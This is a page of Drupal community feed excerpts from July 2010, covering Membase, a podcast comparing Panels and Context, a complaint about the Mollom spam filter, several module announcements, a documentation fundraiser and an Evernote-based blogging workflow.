Drupal Planet - Fri, 07/30/2010 - 17:39

Barry and I just met with a team from Northscale -- the startup formed to support and extend Memcached, the popular key-value cache used by the largest web sites. We learned about their new database project, Membase, and talked about how it could help high-volume Drupal sites including our Acquia Hosting customers.

Membase is built on the core Memcached technology and supports the Memcached API. I'm excited about what they've done to extend Memcached.

Lullabot: Podcast 87: Panels vs Context, The Cage Match!

Drupal Planet - Fri, 07/30/2010 - 17:13

Earl Miles and Young Hahn join Dave Burns, Jeff Eaton, and Jeff Robbins to discuss the similarities and differences between Drupal's Panels and Context modules. Earl is the creator of Panels. Young is the co-creator of Context as well as Features, Spaces, and several other great modules. We open up the cage, toss everyone in, and see what happens!

Also be sure to check out David Burns' article "Assembling Pages with Drupal," which also compares and contrasts Panels and Context.

Damien McKenna: Test upload

Drupal Planet - Fri, 07/30/2010 - 16:05

Testing out the Drag'n'Drop Uploads module to see how it works.

Randy Fay: What's wrong with Mollom?

Drupal Planet - Fri, 07/30/2010 - 13:58

So Mollom absolutely stinks, as far as I'm concerned.

I just posted this comment on a site that is not mine, but is a Drupal site running Mollom: http://www.istos.it/blog/drupal-training/open-sourcing-drupal-training:

The Examples for Developers project is an open-source training initiative. I'm trying to get it used for developer training and to have books on Drupal development use it for examples instead of rolling their own (which invariably get out-of-date and can't be maintained.)

I encourage you in this (vast) initiative.

And what did I get?
Your submission has triggered the spam filter and will not be accepted.

That's about the fourth time I've taken the time to write a comment on a Drupal Mollom-enabled site, and gotten that kind of a response. How many comments are being rejected inappropriately on sites that use Mollom? Who will ever know?

Store RSS Feed And Sitemap v.1.0.0.0 - Google Base Compatible

Ubercart - Fri, 07/30/2010 - 12:41
Contrib type: Module
Status: Complete and working
Moderation: Awaiting moderation
Latest version: 1.0.0.0
Compatibility: Ubercart 1.x, Ubercart 2.x
Sponsored by: Valueforless.com

This module creates a store RSS feed that is ready out of the box for use with Google Base, but the user is given the flexibility to include or exclude elements to suit any other use; flexibility and ease of use were both priorities in creating this module.
Additionally, the module creates a sitemap. Both are indispensable tools for any website.

Localize.drupal.org: Drupalcon Copenhagen multilingual coverage, Jacob Redding talks Localization server

Drupal Planet - Fri, 07/30/2010 - 12:02

I just had the chance to listen to the latest DrupalEasy Podcast published earlier this week, where Ryan Price and Mike Anello interview Jacob Redding on his work, book, and Drupal's general greatness in many fields. Jacob was an early supporter of the Localization server idea that was built out to eventually power http://localize.drupal.org, so it was great to hear that he gives some exciting coverage of the topic (at about the middle of the podcast). He explains the Localization client and its connection to the server, and how these two interact to get as many people as possible submitting translations. If you are not using the Localization client yet, this might be a good time to look at it.

Ronald Ashri: Open Sourcing Drupal Training

Drupal Planet - Fri, 07/30/2010 - 10:19

As Drupal gains popularity, the need for developers is increasing and consequently so is the need for trainers. Let's make sure that the first point of contact for people to the community is a positive experience by open-sourcing our methods of teaching.

How do you explain Drupal to someone completely new to both Drupal and to content management systems? What are the metaphors that people have found work best?

How do you go about introducing hooks and the menu system to developers? Views, Panels, CCK, Context?

Wim Mostrey: The Wysiwyg and CCK multiple value fields

Drupal Planet - Fri, 07/30/2010 - 09:56

Setting up a Wysiwyg or rich text editor in Drupal is a straightforward task: you download the Wysiwyg module along with the library of your favorite editor and you're good to go. You will run into issues when you're using CCK multiple value fields though:

Pronovix: Modulecraft: fundraising to make a Drupal DITA documentation distribution

Drupal Planet - Fri, 07/30/2010 - 09:00

This week we launched modulecraft.com, a fundraising tool that we want to use to raise interest, involvement and money for the development of a series of tools for Drupal professionals. Pure donation systems like ChipIn have a pretty bad track record, but a donation/reward system has, to our knowledge, not yet been tried in the Drupal community. When you donate you will be contributing to the community AND getting something valuable in return.

We launched the platform with Documentation+, our first fundraising effort, whose primary aim is the development of a Documentation distro for Drupal.

For a couple of years now, people in the documentation team have been wanting to implement a DITA architecture for the documentation. DITA is an open standard that was initially developed by IBM and is now managed by OASIS. It is fairly young, but has gained a lot of momentum in the documentation industry.

Chris Shattuck: Using the Evernote module to manage an entire Drupal website with a desktop application

Drupal Planet - Fri, 07/30/2010 - 07:30

This tutorial is sponsored by the Save Joseph campaign. Only 6 more days to save one man from a roomful of teeth. http://savejoseph.org.

I've recently been using the Evernote module to blog, which has made my life surprisingly more rich. After building the module, I started using it right away and found it was the missing piece in creating a workflow that would encourage quality, rapid posting - something I've always wanted to be able to do. Now that it's set up, I feel like I can write with virtually no overhead, and using images - kind of tricky when using webforms and wysiwyg - is about as easy as it can get. Even adding annotations is super simple with Skitch (a writeup for a workflow with Skitch is imminent).

The ease with which I can create content made me wonder if maybe I could run an entire Drupal site's content off of Evernote. So I gave it a shot when setting up http://josephcowman.com, and it worked like a charm!
